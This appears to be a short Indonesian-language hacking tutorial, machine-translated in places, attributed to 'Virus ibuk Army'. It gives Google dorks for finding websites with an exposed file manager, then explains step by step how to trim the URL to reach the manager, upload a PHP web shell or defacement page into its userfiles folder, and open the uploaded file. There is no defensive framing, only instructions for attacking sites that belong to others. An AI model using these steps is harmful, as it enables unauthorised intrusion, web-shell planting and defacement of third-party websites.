Berkas Manajer Eksploitasi

chmood

Virus ibuk Army 00:20 Eksploitasi
Dorks:
inurl: / filemanager / userfiles / filetype: pdf
inurl: /filemanager/index.html
eksploitasi:
http://www.site.com/filemanager/index.html
Ayo mulai !
terbuka google atau bing dan jenis dork inurl: / filemanager / userfiles / filetype: pdf atau
inurl: /filemanager/index.html
sekarang pilih website dari hasil pencarian
setelah mengklik url situs akan
http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
Sekarang Hapus kata kunci setelah filemanager
sebagai contoh :
Sebelum: http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
Setelah: http://www.site.com/filemanager/
Sekarang menemukan pilihan meng-upload di sana dan meng-upload shell atau deface halaman ada
Anda mengajukan akan meng-upload dalam direktori userfiles
Untuk Lihat shell upload atau berkas goto
http://www.site.com/UserFiles/Shell.php
http://www.site.com/UserFiles/deface.html
atau
http://www.site.com/UserFiles/directory/Shell.php

http://www.site.com/UserFiles/directory/deface.html

Komentar